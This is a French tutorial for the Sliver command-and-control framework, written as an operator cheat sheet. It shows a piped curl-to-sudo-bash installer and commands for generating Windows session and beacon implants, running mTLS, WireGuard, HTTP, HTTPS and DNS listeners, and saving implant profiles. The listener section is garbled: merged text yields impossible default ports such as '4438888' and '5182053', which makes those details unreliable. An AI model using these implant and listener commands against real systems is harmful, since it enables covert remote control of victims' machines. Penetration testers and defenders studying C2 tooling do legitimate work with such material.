[Réseau] Sliver C2
Introduction
Sliver C2 est un framework de commande et contrôle qui ressemble un peu à Metasploit.
Il présente des fonctionnalités interéssantes d'obfuscation et des modules permettant de faire de la post-exploitation.
Fonctionnant en mode client-serveur, vous pouvez démarrer un serveur sur un VPS accessible depuis Internet et utiliser le client pour vous connecter sur votre compte d'opérateur, ce qui permet de travailler en équipe.
Vous pouvez aussi travailler directement sur le serveur si vous le souhaitez, ce qui est l'option la plus simple selon moi.
Source
Installation
Linux
Vous pouvez installer Sliver simplement avec la commande suivante pour la plupart des distributions Linux :
curl https://sliver.sh/install | sudo bash
Compiler depuis les sources
Cependant, vous aurez peut-être besoin de compiler vous même, notamment si vous travailler dans des environnement spécifiques tels que Exegol :
git clone https://github.com/BishopFox/sliver.git && cd sliver && git checkout tags/v1.5.39 && make
Implants
Il existe deux types d'implant (Agent C2) dans Sliver :
- Les sessions (utilisent une connexion réseau permanente ce qui permet d'exécuter des commandes et de recevoir le résultat immédiatement). Ils sont très pratiques mais suspects.
- Les beacons (utilisent une connexion réseau temporaire qui est réinitialiser par interval). Les commandes ne sont pas exécutées immédiatement mais ce type de connexion permet d'être assez discret.
Générer un implant de session mtls
generate --mtls<TYPE> <LHOST>:<LPORT> --save <FILE_NAME>.exe
Générer un implant de session wireguard
generate -g <LHOST>:<LPORT> --save <FILE_NAME>.exe
Générer un implant de beacon mtls
generate beacon --mtls<TYPE> <LHOST>:<LPORT> --save <FILE_NAME>.exe --seconds <TIME> --jitter <TIME>
Après le flag --seconds vous devez indiquer le délai entre chaque reconnexion.
Après le flag --jitter vous devez renseigner un délai de temps aléatoire. Par exemple, si le flag --seconds est définit à 3 et que le flag --jitter est définit à 1, une reconnexion sera effectuée de manière aléatoire toutes les 3 ou 4 secondes.
Types d'implants
Types |
Descriptions |
--mtls |
Utilise une connexion chiffrée de type mTLS. |
-g |
Utilise une connexion Wireguard. |
--http |
Utilise une connexion HTTP. |
--https |
Utilise une connexion HTTPS. |
--dns |
Utilise une connexion DNS. |
Convertir un beacon en session
interactive
Listeners
Lancer un listener mtlsmTLS
mtls -l <LPORT>
Le port par défaut de mtlsmTLS est le 4438888.
Lancer un listener wireguardWireguard
wg -l <LPORT>
Le port par défaut dedu wireguardlistener Wireguard est le 5182053.
Lancer un listener HTTP
http -l <LPORT>
Le port par défaut du listener HTTP est le 80.
Lancer un listener HTTPS
https -l <LPORT>
Le port par défaut du listener HTTPS est le 443.
Lancer un listener DNS
dns -d <FQDN>
Le port par défaut du listener DNS est le 53.
Le champs <FQDN> doit être remplacé par le nom de domaine qui pointe sur votre serveur C2.
Afficher les sessions actives
sessions
Terminer une session
sessions -k <ID>
Afficher les beacons actifs
beacons
Profiles
Sliver propose de créer des profiles pour sauvegarder une configuration d'implant que vous pourrez utiliser par la suite.
Créer un profil
profiles new --mtls <LHOST>:<LPORT> --os windows --arch amd64 --format exe <NAME>
Vous pouvez bien sûr, changer le type d'implant, l'OS cible, l'architecture etc.
Vous pouvez aussi créer un profil de beacon :
profiles new beacon --mtls <LHOST>:<LPORT> --os windows --arch amd64 --format exe --seconds 5 --jitter 3 <NAME>
Afficher les profiles / implants
implants